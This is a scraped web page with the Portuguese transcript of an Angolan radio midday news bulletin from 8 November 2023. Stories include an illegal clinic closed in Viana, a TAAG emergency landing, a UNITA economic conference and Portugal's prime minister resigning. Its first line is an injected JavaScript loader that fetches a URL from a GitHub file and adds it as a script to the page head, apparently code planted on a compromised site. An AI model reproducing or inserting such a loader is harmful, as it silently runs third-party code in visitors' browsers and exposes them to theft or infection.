;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Jornal 12h, edição de 08 de Novembro de 2023 | RadioPlayDigital
Jornal 12h, edição de 08 de Novembro de 2023

Destaques:

 ENCERRADA CLÍNICA QUE FUNCIONAVA ILEGALMENTE EM VIANA;

– DESAFIOS ECONÓMICOS DE ANGOLA E O ORÇAMENTO GERAL DO ESTADO EM DISCUSSÃO, EM CONFERÊNCIA PROMOVIDA PELA UNITA;

– FALTA DE EMBARCAÇÕES IMPEDE PARTICIPAÇÃO DE DUPLA OLÍMPICA AO CAMPEONATO AFRICANO DE VELA;

– PORTUGAL SEM GOVERNO. PRIMEIRO-MINISTRO DEMITE-SE DAS FUNÇÕES, APÓS INQUÉRITO SOBRE NEGÓCIOS DE LÍTIO E HIDROGÉNIO VERDE.

JINGLE MIX 

Jornal ao meio dia, quarta-feira, 8 de Novembro de 2023. Coordenação de Alves Fernandes, técnica de Edson Machado e Edmundo Simões, edição de Zacarias Congo.   

JINGLE MV

A polícia em Luanda encerrou uma clínica que funcionava de forma ilegal na cidade da China, no município de Viana.

A informação foi confirmada à MFM pelo porta-voz da DIIP, Direção de Investigação de Ilícitos Penais, intendente Quintino Ferreira.

QUINTINO FERREIRA – 01′ 19” 12H 081123

Indentende Quintino Ferreira, porta-voz da DIIP, Direção de Investigação de Ilícitos Penais, e o encerramento de uma clínica que funcionava de forma ilegal na cidade da China, município de Viana.

E as autoridades policiais no Bengo encaminharam ao Zaire cinco cidadãos estrangeiros provenientes da República Democrática do Congo, no sentido de serem repatriados ao seu país. 

Os referidos cidadãos faziam-se acompanhar de um menor com apenas um mês de vida, tal como fez saber o porta-voz do Ministério do Interior naquela província, superintendente Gaspar Luís Carlos Inácio.

GASPAR LUIS – 55” 12H 081123

Superintendente Gaspar Luís Inácio, porta-voz do MININT no Bengo. 

Um avião do tipo DASH 8-Q400 da TAAG Linhas Aéreas de Angola teve de fazer uma aterragem de emergência, esta terça-feira, no aeroporto Comandante Kwenha, na cidade de Menongue, depois dos passageiros identificarem muito fumo no interior da aeronave, 15 minutos após a descolagem.

A aeronave partiu do aeroporto Comandante Kwenha, em Menongue, por volta das 14 horas e 15 minutos, com 26 passageiros a bordo.

O DASH 8 com destino para Luanda foi forçado a retornar 30 minutos depois de estar no ar. 

A situação, que criou um grande pânico aos passageiros devido ao fumo que se alastrou no interior da aeronave, obrigou os pilotos a analisarem as probabilidades de aterrarem no aeroporto mais próximo, fazendo o retorno para Menongue, onde aterraram com sucesso, sem registo de feridos e danos materiais.

Os 26 passageiros que se encontravam a bordo da referida aeronave saíram todos ilesos e sem qualquer mal-estar do fumo que inalaram no interior do avião DASH 8-Q400 da TAAG. 

Uma equipa técnica da transportadora aérea nacional vai a Menongue para avaliar as reais causas que estiveram na origem deste incidente.

PONTO UNITA

O presidente da UNITA considera que Angola tem tudo para sair da crise económica que enfrenta há vários anos, faltando apenas melhorias nas decisões tomadas pelo governo.  

Adalberto Costa Júnior falava, esta manhã, na abertura da Conferência Nacional sobre os Desafios Económicos de Angola e o Orçamento Geral do Estado, que decorre hoje em Luanda, numa organização da sua força política. 

ADALBERTO COSTA JÚNIOR 01 – 01′ 25” 12H 081123

O líder do maior partido político na oposição falou igualmente sobre os últimos acontecimentos em Portugal, que culminaram com o pedido de demissão do Primeiro-ministro António Costa, após inquérito relacionado com os negócios do lítio e hidrogénio verde.

ADALBERTO COSTA JÚNIOR 02 – 01′ 39” 12H 081123

Presidente da UNITA, Adalberto Costa Júnior, quando falava esta manhã durante a Conferência Nacional sobre os Desafios Económicos de Angola e o Orçamento Geral do Estado, que decorre neste momento em Luanda, numa organização da sua força política.  

PONTO INTERNACIONAL

O Primeiro-ministro de Portugal, António Costa, pediu esta terça-feira, demissão das funções após um inquérito relacionado com os negócios do lítio e hidrogénio verde, assim como numa investigação autónoma do Ministério Público.

António Costa apresentou o pedido de demissão ao Presidente de Portugal, Marcelo Rebelo de Sousa, que já aceitou o pedido.

Face a este cenário, Marcelo Rebelo de Sousa deverá marcar eleições legislativas antecipadas após auscultar o Conselho da República.

Durante uma conferência de imprensa realizada esta tarde, em Lisboa, António Costa afirmou que não teme pelos casos de que é acusado, pelo que acredita na justiça.

ANTÓNIO COSTA – 01′ 06” 12H 081123

Primeiro-ministro de Portugal, António Costa, que pediu esta terça-feira demissão das funções após inquérito relacionado com os negócios do lítio e hidrogénio verde, assim como numa investigação autónoma do Ministério Público.

PONTO ECONOMIA

Voltamos a falar sobre economia…

Esta semana fica marcada com o anúncio do Presidente da República, que fez saber no Bengo que o governo vai deixar de construir centralidades, depois de erguer as infraestruturas anunciadas para as províncias do Cuanza Norte, Malanje, Zaire e Cabinda.

João Lourenço, que falava aos jornalistas, depois de inaugurar a Centralidade “Teresa Afonso Gomes”, garantiu que o estado continuará a criar políticas para tornar os preços de materiais de construção mais acessíveis, bem como continuar a investir em projectos habitacionais. 

JOÃO LOURENÇO – 02’ 19’’ 12H 071123 1 

Presidente da República, João Lourenço, quando falava, esta semana, aos jornalistas no Bengo, depois de inaugurar a Centralidade “Teresa Afonso Gomes”. 

E reagindo as declarações do Chefe de Estado, o analista MFM, Carlos Rosado de Carvalho, pensa que a medida de João Lourenço é ousada, mas pertinente para colocar ordem no mercado imobiliário angolano;

CARLOS ROSADO DE CARVALHO – 02’’ 10’’ 12H 081123

Analista MFM, Carlos Rosado de Carvalho. 

Angola e EUA estão a firmar a uma parceria forte em varias áreas, segundo a vice-secretária adjunta do Gabinete de Assuntos Africanos do Departamento de Estado dos EUA, Joy Basu. 

A diplomata americana iniciou uma visita de três dias a Angola, com o objectivo de fortalecer as relações diplomáticas visando o reforço das parcerias económicas entre os dois países.

Para acompanhar a tradução das palavras de Joy Basu, que falava aos jornalistas, depois te ter sido recebida ontem pelo Presidente da República , João Lourenço.  

JOY BASU – 01′ 40” 12H 081123 

Aqui a tradução das palavras da vice-secretária adjunta do Gabinete de Assuntos Africanos do Departamento de Estado dos EUA, Joy Basu, quando falava ontem aos jornalistas depois de ter sido recebida pelo Presidente da República. 

Durante a sua visita ao nosso país, a diplomata tem marcada reuniões com o sector privado e autoridades governamentais, nomeadamente com o BNA, incluindo os ministros do Comércio e dos Transportes.

PONTO

Os ex-trabalhadores da Brigada Especial de Limpeza da Casa Militar do Presidente da República de Angola continuam a aguardar pela resposta do Tribunal Provincial de Luanda quanto ao pagamento de indemnizações que reclamam desde 2012 e que já foi decidida pelo Tribunal Provincial de Luanda, não tendo se concretizado até ao momento.

Domingos Vieira, o porta-voz do efectivo, esclarece que a brigada foi em criada 2002 e os trabalhadores foram despedidos oito anos depois, por terem reivindicado, na altura, a falta de pagamento de quatro meses de salários em atraso.

Na sequência, segundo Domingos Vieira, os trabalhadores foram substituídos por outros funcionários, já que a instituição nunca foi extinta. 

DOMINGOS VIEIRA – 02′ 21” 12H 081123

Entre o grupo de 1500 pessoas, estão ex-trabalhadores, dos quais antigos militares, auxiliares de limpeza, operadores de máquina e ainda viúvas e filhos. 

Irina Vanuza, também ela antiga trabalhadora da Brigada de Limpeza da Casa Militar do Presidente da República, conta que as ações de protesto iniciadas ontem junto do Tribunal Provincial de Luanda vão continuar, caso não haja uma resposta satisfatória das suas reclamações.

IRINA VANUZA – 01′ 38” 12H 081123

Os ex-trabalhadores, que dizem já ter escrito para várias instituições e entidades sobre a sua situação, prometem continuar as ações de reivindicação até verem resolvida a sua situação. 

PONTO

Cresce o número de pessoas que acorre ao aterro sanitário dos Mulenvos, no município de Viana, no sentido de recolher lixo para vender e com isso estarem em condições de sustentarem

A Maria Humba esteve novamente no local e conversou com alguns cidadãos.

MARIA HUMBA 12H

Trabalho da jornalista Maria Humba.

PONTO DESPORTO

A dupla Olímpica de Velejadores angolanos Matias Moutinho e Emanuela Paulo da classe 470 já não vai competir no africano de Vela no Egipto, devido à falta de embarcações de competições para esta classe. 

O vice-presidente da Federação Angolana dos Desportos Náuticos, Nuno Gomes, disse à MFM que se tudo correr bem, Angola vai competir no africano do Egipto apenas com os velejadores Filipe André e  João Artur da classe ILCA 7 e a velejadora Aline Lourenço da classe ILCA4. 

RD-NUNO GOMES-PARTE 1. 

Quanto aos Velejadores Matias Moutinho e Emanuela Paulo da classe 470, que procuram a qualifacção aos jogos Olímpicos de Paris 2024, terão de competir no campeonato do mundo em Palma de Maiorca-Espanha, marcado para fevereiro de 2024. 

Nuno Gomes garante que a dupla olimpica, vai continuar a treinar para atacar ao mundial de Espanha, quanto ao africano do Egito, o dirigente fez saber que continuam aguardar carta convite e papelada da organização para processar vistos e passagens. 

RD-NUNO GOMES-PARTE 2. 

No campeonato do mundo em Espanha, o primeiro classificado africano da classificação geral qualificará o seu país para PARIS2024. 

Data de Emissão: 08-11-2023 às 12:30
Género(s): Noticiário
 
PARTICIPANTES
PUB RADIO PLAY

Relacionados